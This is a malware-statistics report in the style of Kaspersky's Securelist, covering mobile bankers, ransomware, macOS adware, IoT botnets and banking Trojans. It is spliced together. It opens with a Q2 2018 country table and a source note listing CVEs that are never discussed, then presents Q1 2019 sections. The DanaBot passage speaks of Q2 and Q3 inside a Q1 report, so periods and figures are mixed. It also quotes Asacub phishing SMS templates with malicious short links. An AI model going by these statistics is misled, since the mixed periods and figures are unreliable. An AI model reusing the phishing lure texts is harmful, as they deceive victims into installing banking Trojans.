| 8 | Kyrgyzstan | 41.34 |
| 9 | Rwanda | 40.88 |
| 10 | Mongolia | 40.71 |
| 11 | Algeria | 40.25 |
| 12 | Laos | 40.18 |
| 13 | Syria | 39.82 |
| 14 | Cameroon | 38.83 |
| 15 | Mozambique | 38.24 |
| 16 | Bangladesh | 37.57 |
| 17 | Sudan | 37.31 |
| 18 | Nepal | 37.02 |
| 19 | Zambia | 36.60 |
| 20 | Djibouti | 36.35 |

_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives._
_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._
_** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._

_Geography of malicious web attacks in Q2 2018 (ranked by percentage of users attacked)_ [(image)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175902/180803-it-threat-evolution-q2-2018-statistics-22.png>)

On average, 19.58% of computers globally faced at least one Malware-class local threat in Q2.

_Source: "IT threat evolution Q2 2018. Statistics", Securelist blog, published 2018-08-06, https://securelist.com/it-threat-evolution-q2-2018-statistics/87170/. CVEs referenced: CVE-2017-0199, CVE-2017-11882, CVE-2017-8570, CVE-2018-4990, CVE-2018-5002, CVE-2018-8120, CVE-2018-8174._

_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data._

## Quarterly figures

According to Kaspersky Security Network,

 * Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.
 * 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.
 * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 243,604 users.
 * Ransomware attacks were defeated on the computers of 284,489 unique users.
 * Our File Anti-Virus detected 247,907,593 unique malicious and potentially unwanted objects.
 * Kaspersky Lab products for mobile devices detected:
   * 905,174 malicious installation packages
   * 29,841 installation packages for mobile banking Trojans
   * 27,928 installation packages for mobile ransomware Trojans

## Mobile threats

### Quarterly highlights

Q1 2019 is remembered mainly for mobile financial threats.

First, the operators of the Russia-targeting Asacub Trojan made several large-scale distribution attempts, reaching up to 13,000 unique users per day. The attacks used active bots to send malicious links to contacts in already infected smartphones.
The mailings contained one of the following messages:

_{Name of victim}, you received a new mms: ____________________________ from {Name of victim's contact}_
_{Name of victim}, the mms: smsfn.pro/3ftjR was received from {Name of victim's contact}_
_{Name of victim}, photo: smslv.pro/c0Oj0 received from {Name of victim's contact}_
_{Name of victim}, you have an mms notification ____________________________ from {Name of victim's contact}_

Second, the start of the year saw a rise in the number of malicious apps in the Google Play store aimed at stealing credentials from users of Brazilian online banking apps.

[(image)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172941/it-threat-stats-q1-2019-1.png>)

Although such malware appeared on the most popular app platform, the number of downloads was extremely low. We are inclined to believe that cybercriminals are having problems luring victims to pages with malicious apps.

### Mobile threat statistics

In Q1 2019, Kaspersky Lab detected 905,174 malicious installation packages, which is 95,845 packages down on the previous quarter.

_Number of detected malicious installation packages, Q2 2018 – Q1 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171046/mobile-malware-apk.png>)

#### Distribution of detected mobile apps by type

_Distribution of newly detected mobile apps by type, Q4 2018 and Q1 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171122/infographic.png>)

Among all the threats detected in Q1 2019, the lion's share went to potentially unsolicited RiskTool apps with 29.80%, a fall of 19 p.p. against the previous quarter. The most frequently encountered objects came from the RiskTool.AndroidOS.Dnotua (28% of all detected threats of this class), RiskTool.AndroidOS.Agent (27%), and RiskTool.AndroidOS.SMSreg (16%) families.

In second place were threats in the Trojan-Dropper class (24.93%), whose share increased by 13 p.p. The vast majority of files detected belonged to the Trojan-Dropper.AndroidOS.Wapnor family (93% of all detected threats of this class). Next came the Trojan-Dropper.AndroidOS.Agent (3%) and Trojan-Dropper.AndroidOS.Hqwar (2%) families, and others.

The share of advertising apps (adware) doubled compared to Q4 2018. The AdWare.AndroidOS.Agent (44.44% of all threats of this class), AdWare.AndroidOS.Ewind (35.93%), and AdWare.AndroidOS.Dnotua (4.73%) families were the biggest contributors.

The statistics show a significant rise in the number of mobile financial threats in Q1 2019. The share of mobile banking Trojans rose from 1.85% of all detected threats in Q4 2018 to 3.24% in Q1 2019.

The most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (20% of all detected mobile bankers), Trojan-Banker.AndroidOS.Asacub (18%), and Trojan-Banker.AndroidOS.Agent (15%) families.

### Top 20 mobile malware programs

_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._

|   | Verdict | %* |
|---|---|---|
| 1 | DangerousObject.Multi.Generic | 54.26 |
| 2 | Trojan.AndroidOS.Boogr.gsh | 12.72 |
| 3 | Trojan-Banker.AndroidOS.Asacub.snt | 4.98 |
| 4 | DangerousObject.AndroidOS.GenericML | 4.35 |
| 5 | Trojan-Banker.AndroidOS.Asacub.a | 3.49 |
| 6 | Trojan-Dropper.AndroidOS.Hqwar.bb | 3.36 |
| 7 | Trojan-Dropper.AndroidOS.Lezok.p | 2.60 |
| 8 | Trojan-Banker.AndroidOS.Agent.ep | 2.53 |
| 9 | Trojan.AndroidOS.Dvmap.a | 1.84 |
| 10 | Trojan-Banker.AndroidOS.Svpeng.q | 1.83 |
| 11 | Trojan-Banker.AndroidOS.Asacub.cp | 1.78 |
| 12 | Trojan.AndroidOS.Agent.eb | 1.74 |
| 13 | Trojan.AndroidOS.Agent.rt | 1.72 |
| 14 | Trojan-Banker.AndroidOS.Asacub.ce | 1.70 |
| 15 | Trojan-SMS.AndroidOS.Prizmes.a | 1.66 |
| 16 | Exploit.AndroidOS.Lotoor.be | 1.59 |
| 17 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.57 |
| 18 | Trojan-Dropper.AndroidOS.Tiny.d | 1.51 |
| 19 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.49 |
| 20 | Trojan.AndroidOS.Triada.dl | 1.47 |

_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked._

As is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.

In second place came Trojan.AndroidOS.Boogr.gsh (12.72%). This verdict is assigned to files recognized as malicious by our system [based on machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).

Third place went to the Trojan-Banker.AndroidOS.Asacub.snt banker (4.98%). In Q1, this family was well represented in our Top 20, holding four positions out of 20 (3rd, 5th, 11th, 14th).

The DangerousObject.AndroidOS.GenericML verdict (4.35%), which ranked fourth in Q1, is perhaps the most interesting. It is given to files detected by machine learning. But unlike the Trojan.AndroidOS.Boogr.gsh verdict, which is assigned to malware that is processed and detected inside Kaspersky Lab's infrastructure, the DangerousObject.AndroidOS.GenericML verdict is given to files on the side of users of the company's security solutions, before such files go for processing. The latest threat patterns are now detected this way.

Sixth and seventeenth places were taken by members of the Hqwar dropper family: Trojan-Dropper.AndroidOS.Hqwar.bb (3.36%) and Trojan-Dropper.AndroidOS.Hqwar.gen (1.57%), respectively. These packers most often contain banking Trojans, including Asacub.

Seventh position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.60%). The Lezok family is notable for its variety of distribution schemes, among them a supply chain attack, whereby the malware is sewn into the firmware of the mobile device before delivery to the store. This is very dangerous for two reasons:

 * It is extremely difficult for an ordinary user to determine whether their device is already infected.
 * Getting rid of such malware is highly complex.

The Lezok Trojan family is designed primarily to display persistent ads, sign users up for paid SMS subscriptions, and inflate counters for apps on various platforms.

The last Trojan worthy of mention in the Top 20 mobile threats is Trojan-Banker.AndroidOS.Agent.ep. It is encountered both in standalone form and inside Hqwar droppers. The malware has extensive capabilities for countering dynamic analysis, and can detect being launched in the Android Emulator or Genymotion environment. It can open arbitrary web pages to phish for login credentials.
It uses Accessibility Services to obtain various rights and interact with other apps.\n\n### Geography of mobile threats\n\n_Map of mobile malware infection attempts, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172806/en-mobile-malware-map.png>)\n\nTop 10 countries by share of users attacked by mobile malware:\n\n| Country* | %** \n---|---|--- \n1 | Pakistan | 37.54 \n2 | Iran | 31.55 \n3 | Bangladesh | 28.38 \n4 | Algeria | 24.03 \n5 | Nigeria | 22.59 \n6 | India | 21.53 \n7 | Tanzania | 20.71 \n8 | Indonesia | 17.16 \n9 | Kenya | 16.27 \n10 | Mexico | 12.01 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nPakistan (37.54%) ranked first, with the largest number of users in this country being attacked by AdWare.AndroidOS.Agent.f, AdWare.AndroidOS.Ewind.h, and AdWare.AndroidOS.HiddenAd.et adware.\n\nSecond place was taken by Iran (31.55%), which appears consistently in the Top 10 every quarter. The most commonly encountered malware in this country was Trojan.AndroidOS.Hiddapp.bn, as well as the potentially unwanted apps RiskTool.AndroidOS.Dnotua.yfe and RiskTool.AndroidOS.FakGram.a. Of these three, the latter is the most noteworthy \u2013 the main task of this app is to intercept Telegram messages. 
It should be mentioned that Telegram is banned in Iran, so any of its clones are in demand, as confirmed by the infection statistics.\n\nThird place went to Bangladesh (28.38%), where in Q1 the same advertising apps were weaponized as in Pakistan.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **29,841** installation packages for mobile banking Trojans, almost 11,000 more than in Q4 2018.\n\nThe greatest contributions came from the creators of the Trojan-Banker.AndroidOS.Svpeng (20% of all detected banking Trojans), the second-place Trojan-Banker.AndroidOS.Asacub (18%), and the third-place Trojan-Banker.AndroidOS.Agent (15%) families.\n\n_Number of installation packages for mobile banking Trojans, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171308/banking-malware-apk.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.snt | 23.32 \n2 | Trojan-Banker.AndroidOS.Asacub.a | 16.35 \n3 | Trojan-Banker.AndroidOS.Agent.ep | 11.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 8.57 \n5 | Trojan-Banker.AndroidOS.Asacub.cp | 8.33 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.96 \n7 | Trojan-Banker.AndroidOS.Svpeng.ak | 7.00 \n8 | Trojan-Banker.AndroidOS.Agent.eq | 4.96 \n9 | Trojan-Banker.AndroidOS.Asacub.ar | 2.47 \n10 | Trojan-Banker.AndroidOS.Hqwar.t | 2.10 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by banking threats._\n\nThis time, fully half the Top 10 banking threats are members of the Trojan-Banker.AndroidOS.Asacub family: five positions out of ten. The creators of this Trojan actively distributed samples throughout Q1. In particular, the number of users attacked by the Asacub.cp Trojan reached 8,200 per day. 
But even this high result was surpassed by Asacub.snt with 13,000 users per day at the peak of the campaign.\n\nIt was a similar story with Trojan-Banker.AndroidOS.Agent.ep: We recorded around 3,000 attacked users per day at its peak. However, by the end of the quarter, the average daily number of attacked unique users had dropped below 1,000. Most likely, this was due not to decreased demand for the Trojan, but to cybercriminals' transition to a two-stage system of infection using Hqwar droppers.\n\n_Geography of mobile banking threats, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171335/en-banking-malware-map.png>)\n\n**Top 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Australia | 0.81 \n2 | Turkey | 0.73 \n3 | Russia | 0.64 \n4 | South Africa | 0.35 \n5 | Ukraine | 0.31 \n6 | Tajikistan | 0.25 \n7 | Armenia | 0.23 \n8 | Kyrgyzstan | 0.17 \n9 | US | 0.16 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nIn Q1 2019, Australia (0.81%) took first place in our Top 10. The most common infection attempts we registered in this country were by Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep. 
Neither type of malware is exclusive to Australia; both are used in attacks worldwide.\n\nSecond place was taken by Turkey (0.73%), where, as in Australia, Trojan-Banker.AndroidOS.Agent.ep was most often detected.\n\nRussia is in third place (0.64%), where we most frequently detected malware from the Asacub and Svpeng families.\n\n### Mobile ransomware\n\nIn Q1 2019, we detected **27,928** installation packages of mobile ransomware, which is 3,900 more than in the previous quarter.\n\n_Number of mobile ransomware installation packages detected by Kaspersky Lab (Q2 2018 \u2013 Q1 2019)_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171455/mobile-ransomware.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ah | 28.91 \n2 | Trojan-Ransom.AndroidOS.Rkor.h | 19.42 \n3 | Trojan-Ransom.AndroidOS.Svpeng.aj | 9.46 \n4 | Trojan-Ransom.AndroidOS.Small.as | 8.81 \n5 | Trojan-Ransom.AndroidOS.Rkor.snt | 5.36 \n6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 5.21 \n7 | Trojan-Ransom.AndroidOS.Small.o | 3.24 \n8 | Trojan-Ransom.AndroidOS.Fusob.h | 2.74 \n9 | Trojan-Ransom.AndroidOS.Small.ce | 2.49 \n10 | Trojan-Ransom.AndroidOS.Svpeng.snt | 2.33 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by ransomware._\n\nIn Q1 2019, the most common mobile ransomware family was Svpeng with four positions in the Top 10.\n\n_Geography of mobile ransomware, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171523/en-mobile-ransomware-map.png>)\n\nTop 10 countries by share of users attacked by mobile ransomware:\n\n| Country* | %** \n---|---|--- \n1 | US | 1.54 \n2 | Kazakhstan | 0.36 \n3 | Iran | 0.28 \n4 | Pakistan | 0.14 \n5 | Mexico | 0.10 \n6 | Saudi Arabia | 0.10 \n7 | Canada | 0.07 \n8 | Italy | 0.07 \n9 | Indonesia | 0.05 \n10 | Belgium | 0.05 \n \n_* Excluded from the rating are 
countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile ransomware as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nThe Top 3 countries by number of users attacked by mobile ransomware, as in the previous quarter, were the US (1.54%), Kazakhstan (0.36%), and Iran (0.28%).\n\n## Attacks on Apple macOS\n\nOn the topic of threats to various platforms, such a popular system as macOS cannot be ignored. Although new malware families for this platform are relatively rare, threats do exist for it, largely in the shape of adware.\n\nThe modus operandi of such apps is widely known: infect the victim, take root in the system, and show advertising banners. That said, for each ad displayed and banner clicked the attackers receive a very modest fee, so they need:\n\n 1. The code that displays the advertising banner to run as often as possible on the infected machine,\n 2. The victim to click on the banners as often as possible,\n 3. As many victims as possible.\n\nIt should be noted that the adware infection technique and adware behavior on the infected machine at times differ little from those of malware. 
Meanwhile, the banners themselves can be shown in an arbitrary place on the screen at any time, be it in an open browser window, in a separate window in the center of the screen, etc.\n\n### Top 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 24.62 \n2 | AdWare.OSX.Spc.a | 20.07 \n3 | AdWare.OSX.Pirrit.j | 10.31 \n4 | AdWare.OSX.Pirrit.p | 8.44 \n5 | AdWare.OSX.Agent.b | 8.03 \n6 | AdWare.OSX.Pirrit.o | 7.45 \n7 | AdWare.OSX.Pirrit.s | 6.88 \n8 | AdWare.OSX.Agent.c | 6.03 \n9 | AdWare.OSX.MacSearch.a | 5.95 \n10 | AdWare.OSX.Cimpli.d | 5.72 \n11 | AdWare.OSX.Mcp.a | 5.71 \n12 | AdWare.OSX.Pirrit.q | 5.55 \n13 | AdWare.OSX.MacSearch.d | 4.48 \n14 | AdWare.OSX.Agent.a | 4.39 \n15 | Downloader.OSX.InstallCore.ab | 3.88 \n16 | AdWare.OSX.Geonei.ap | 3.75 \n17 | AdWare.OSX.MacSearch.b | 3.48 \n18 | AdWare.OSX.Geonei.l | 3.42 \n19 | AdWare.OSX.Bnodlero.q | 3.33 \n20 | RiskTool.OSX.Spigot.a | 3.12 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab's security solutions for macOS that were attacked._\n\nTrojan-Downloader.OSX.Shlayer.a (24.62%) finished first in our ranking of macOS threats. Malware from the Shlayer family is distributed under the guise of Flash Player or its updates. Their main task is to download and install various advertising apps, including Bnodlero.\n\nAdWare.OSX.Spc.a (20.07%) and AdWare.OSX.Mcp.a (5.71%) are typical adware apps that are distributed together with various \"cleaner\" programs for macOS. After installation, they write themselves to the autoloader and run in the background.\n\nMembers of the AdWare.OSX.Pirrit family add extensions to the victim's browser; some versions also install a proxy server on the victim's machine to intercept traffic from the browser. 
All this serves one purpose \u2013 to inject advertising into web pages viewed by the user.\n\nThe malware group consisting of AdWare.OSX.Agent.a, AdWare.OSX.Agent.b, and AdWare.OSX.Agent.c is closely related to the Pirrit family, since it often downloads members of the latter. Essentially, it can download, unpack, and launch various files, as well as embed JS code with ads into web pages seen by the victim.\n\nAdWare.OSX.MacSearch is another family of advertising apps with extensive tools for interacting with the victim's browser. It can manipulate the browser history (read/write), change the browser search system to its own, add extensions, and embed advertising banners on pages viewed by the user. Plus, it can download and install other apps without the user's knowledge.\n\nAdWare.OSX.Cimpli.d (5.72%) is able to download and install other advertising apps, but its main purpose is to change the browser home page and install advertising extensions. As with other adware apps, all these actions have the aim of displaying ads in the victim's browser.\n\nThe creators of the not-a-virus:Downloader.OSX.InstallCore family, having long perfected their tricks on Windows, transferred the same techniques to macOS. The typical InstallCore member is in fact an installer (more precisely, a framework for creating an installer with extensive capabilities) of other programs that do not form part of the main InstallCore package and are downloaded separately. Besides legitimate software, it can distribute less salubrious apps, including ones containing aggressive advertising. Among other things, InstallCore is used to distribute DivX Player.\n\nThe AdWare.OSX.Geonei family is one of the oldest adware families for macOS. It employs its creators' own obfuscation techniques to evade security solutions. 
As is typical for adware programs, its main task is to display ads in the browser by embedding them in the HTML code of the web page.\n\nLike other similar apps, AdWare.OSX.Bnodlero.q (3.33%) installs advertising extensions in the user's browser, and changes the default search engine and home page. What's more, it can download and install other advertising apps.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 11.54 \n2 | Spain | 9.75 \n3 | India | 8.83 \n4 | Italy | 8.20 \n5 | US | 8.03 \n6 | Canada | 7.94 \n7 | UK | 7.52 \n8 | Russia | 7.51 \n9 | Brazil | 7.45 \n10 | Mexico | 6.99 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's security solutions for macOS (under 10,000)._ \n_** Unique attacked users as a percentage of all users of Kaspersky Lab's security solutions for macOS in the country._\n\nIn Q1 2019, France (11.54%) took first place in the Top 10. The most common infection attempts we registered in this country came from Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a and AdWare.OSX.Bnodlero.q.\n\nUsers from Spain (9.75%), India (8.83%), and Italy (8.20%) \u2013 who ranked second, third, and fourth, respectively \u2013 most often encountered Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a, AdWare.OSX.Bnodlero.q, AdWare.OSX.Pirrit.j, and AdWare.OSX.Agent.b.\n\nFifth place in the ranking went to the US (8.03%), which saw the same macOS threats as Europe. Note that US residents also had to deal with advertising apps from the Cimpli family.\n\n## IoT attacks\n\n### Interesting events\n\nIn Q1 2019, we noticed several curious features in the behavior of IoT malware. First, some Mirai samples were equipped with a check for an artificial (sandbox) environment: if the malware detected it was running in a sandbox, it stopped working. 
The implementation was primitive \u2013 scanning for the presence of procfs.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172955/it-threat-stats-q1-2019-6.png>)\n\nBut we expect it to become more complex in the near future.\n\nSecond, one of the versions of Mirai was found to contain a mechanism for clearing the environment of other bots. It works from a list of name templates, killing any process whose name matches one of them. Interestingly, Mirai itself ended up in the list of such names (the malware itself does not contain \"mirai\" in its process name):\n\n * dvrhelper\n * dvrsupport\n * **mirai**\n * blade\n * demon\n * hoho\n * hakai\n * satori\n * messiah\n * mips\n\nLastly, a few words about a miner with an old exploit for Oracle Weblogic Server, although it is not actually IoT malware but a Trojan for Linux.\n\nTaking advantage of the fact that Weblogic Server is cross-platform and can be run on a Windows host or under Linux, the cybercriminals embedded checks for different operating systems, and are now attacking Windows hosts along with Linux.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22173014/it-threat-stats-q1-2019-7.png>)\n\n_Section of code responsible for attacking Windows and Linux hosts_\n\n### IoT threat statistics\n\nQ1 demonstrated that there are still many devices in the world that attack each other through telnet. Note, however, that this has nothing to do with the properties of the protocol itself. It is just that devices or servers managed through SSH are closely monitored by administrators and hosting companies, and any malicious activity is terminated. This is one reason why there are significantly fewer unique addresses attacking via SSH than there are IP addresses from which the telnet attacks come. 
\n \nSSH | 17% \nTelnet | 83% \n \n_Table of the popularity distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2019_\n\nNevertheless, cybercriminals are actively using powerful servers to manage their vast botnets. This is evident from the number of sessions in which cybercriminal servers interacted with Kaspersky Lab's traps. \n \nSSH | 64% \nTelnet | 36% \n \n_Table of distribution of cybercriminal working sessions with Kaspersky Lab's traps, Q1 2019_\n\nIf attackers have SSH access to an infected device, they have far greater scope to monetize the infection. In the overwhelming majority of cases involving intercepted sessions, we registered spam mailings, attempts to use our trap as a proxy server, and (least often of all) cryptocurrency mining.\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's telnet traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171650/en-iot-telnet-map.png>)\n\nTop 10 countries where devices were located that carried out telnet-based attacks on Kaspersky Lab's traps.\n\n| Country | %* \n---|---|--- \n1 | Egypt | 13.46 \n2 | China | 13.19 \n3 | Brazil | 11.09 \n4 | Russia | 7.17 \n5 | Greece | 4.45 \n6 | Jordan | 4.14 \n7 | US | 4.12 \n8 | Iran | 3.24 \n9 | India | 3.14 \n10 | Turkey | 2.49 \n \n_* Infected devices in the country as a percentage of the total number of all infected IoT devices attacking via telnet._\n\nIn Q1 2019, Egypt (13.46%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab's traps. 
Second place by a small margin goes to China (13.19%), with Brazil (11.09%) in third.\n\nCybercriminals most often used telnet attacks to infect devices with one of the many Mirai family members.\n\n**Top 10 malware downloaded to infected IoT devices following a successful telnet attack**\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 71.39 \n2 | Backdoor.Linux.Mirai.ba | 20.15 \n3 | Backdoor.Linux.Mirai.au | 4.85 \n4 | Backdoor.Linux.Mirai.c | 1.35 \n5 | Backdoor.Linux.Mirai.h | 1.23 \n6 | Backdoor.Linux.Mirai.bj | 0.72 \n7 | Trojan-Downloader.Shell.Agent.p | 0.06 \n8 | Backdoor.Linux.Hajime.b | 0.06 \n9 | Backdoor.Linux.Mirai.s | 0.06 \n10 | Backdoor.Linux.Gafgyt.bj | 0.04 \n \n_* Share of malware in the total amount of malware downloaded to IoT devices following a successful telnet attack_\n\nIt is worth noting that bots based on Mirai code make up most of the Top 10. There is nothing surprising about this, and the situation could persist for a long time given Mirai's universality.\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's SSH traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171814/en-iot-ssh-map.png>)\n\nTop 10 countries in which devices were located that carried out SSH-based attacks on Kaspersky Lab's traps.\n\n| Country | %* \n---|---|--- \n1 | China | 23.24 \n2 | US | 9.60 \n3 | Russia | 6.07 \n4 | Brazil | 5.31 \n5 | Germany | 4.20 \n6 | Vietnam | 4.11 \n7 | France | 3.88 \n8 | India | 3.55 \n9 | Egypt | 2.53 \n10 | Korea | 2.10 \n \n_* Infected devices in the country as a percentage of the total number of infected IoT devices attacking via SSH_\n\nMost often, a successful SSH-based attack resulted in the following malware being downloaded to the victim's device: Backdoor.Perl.Shellbot.cd, Backdoor.Perl.Tsunami.gen, and Trojan-Downloader.Shell.Agent.p.\n\n## Financial threats\n\n### Quarterly 
highlights\n\nThe banker Trojan DanaBot, detected in [Q2](<https://securelist.com/it-threat-evolution-q2-2018-statistics/87170/>), continued to grow actively. The new modification not only updated the communication protocol with the C&C center, but expanded the list of organizations targeted by the malware. Whereas last quarter the main targets were located in Australia and Poland, in Q3 organizations in Austria, Germany, and Italy were added.\n\nRecall that DanaBot has a modular structure and can load additional plugins to intercept traffic, steal passwords, and hijack crypto wallets. The malware was distributed through spam mailings with a malicious office document, which was used to download the main body of the Trojan.\n\n### Financial threat statistics\n\nIn Q1 2019, Kaspersky Lab solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 243,604 users.\n\n_Number of unique users attacked by financial malware, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171934/en-finance.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23125708/en-finance-map.png>)\n\n#### Top 10 countries by share of attacked users\n\n**Country*** | **%**** \n---|--- \nSouth Korea | 2.2 \nChina | 2.1 \nBelarus | 1.6 \nVenezuela | 1.6 \nSerbia | 1.6 \nGreece | 1.5 \nEgypt | 1.4 \nPakistan | 1.3 \nCameroon | 1.3 \nZimbabwe | 1.3 \n \n_* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000)._ \n_** Unique users whose computers were targeted by 
banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n### Top 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | RTM | Trojan-Banker.Win32.RTM | 27.42 \n2 | Zbot | Trojan.Win32.Zbot | 22.86 \n3 | Emotet | Backdoor.Win32.Emotet | 9.36 \n4 | Trickster | Trojan.Win32.Trickster | 6.57 \n5 | Nymaim | Trojan.Win32.Nymaim | 5.85 \n6 | Nimnul | Virus.Win32.Nimnul | 4.59 \n7 | SpyEye | Backdoor.Win32.SpyEye | 4.29 \n8 | Neurevt | Trojan.Win32.Neurevt | 3.56 \n9 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.64 \n10 | Tinba | Trojan-Banker.Win32.Tinba | 1.39 \n \n_* Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2019, the familiar Trojan-Banker.Win32.RTM (27.4%), Trojan.Win32.Zbot (22.9%), and Backdoor.Win32.Emotet (9.4%) made up the Top 3. In fourth place was Trojan.Win32.Trickster (6.6%), and fifth was Trojan.Win32.Nymaim (5.9%).\n\n## Ransomware programs\n\n### Quarterly highlights\n\nThe most high-profile event of the quarter was probably the [LockerGoga ransomware attack](<https://ics-cert.kaspersky.com/news/2019/03/22/metallurgical-giant-norsk-hydro-attacked-by-encrypting-malware/>) on several major companies. The ransomware code itself constitutes nothing new, but the large-scale infections attracted the attention of the media and the public. Such incidents yet again spotlight the issue of corporate and enterprise network security, because in the event of penetration, instead of using ransomware (which would immediately make itself felt), cybercriminals can install spyware and steal confidential data for years on end without being noticed.\n\nA vulnerability was discovered in the popular WinRAR archiver that allows an arbitrary file to be placed in an arbitrary directory when unpacking an ACE archive. 
The cybercriminals did not miss the chance to [assemble an archive](<https://www.bleepingcomputer.com/news/security/jneca-ransomware-spread-by-winrar-ace-exploit/>) that unpacks the executable file of the JNEC ransomware into the system autorun directory.\n\nFebruary saw [attacks](<https://www.bleepingcomputer.com/forums/t/691852/cr1ptt0r-ransomware-files-encrypted-readmetxt-support-topic/>) on network-attached storages (NAS), in which Trojan-Ransom.Linux.Cryptor malware was installed on the victim device, encrypting data on all attached drives using elliptic-curve cryptography. Such attacks are especially dangerous because NAS devices are often used to store backup copies of data. What's more, the victim tends to be unaware that a separate device running Linux might be targeted by intruders.\n\nNomoreransom.org partners, in cooperation with cyber police, [created](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>) a utility for decrypting files impacted by GandCrab (Trojan-Ransom.Win32.GandCrypt) up to and including version 5.1. It helps victims of the ransomware to restore access to their data without paying a ransom. Unfortunately, as is often the case, shortly after the public announcement, the cybercriminals updated the malware to version 5.2, which cannot be decrypted by this tool.\n\n### Statistics\n\n#### Number of new modifications\n\nThe number of new modifications fell markedly against Q4 2018 to the level of Q3. 
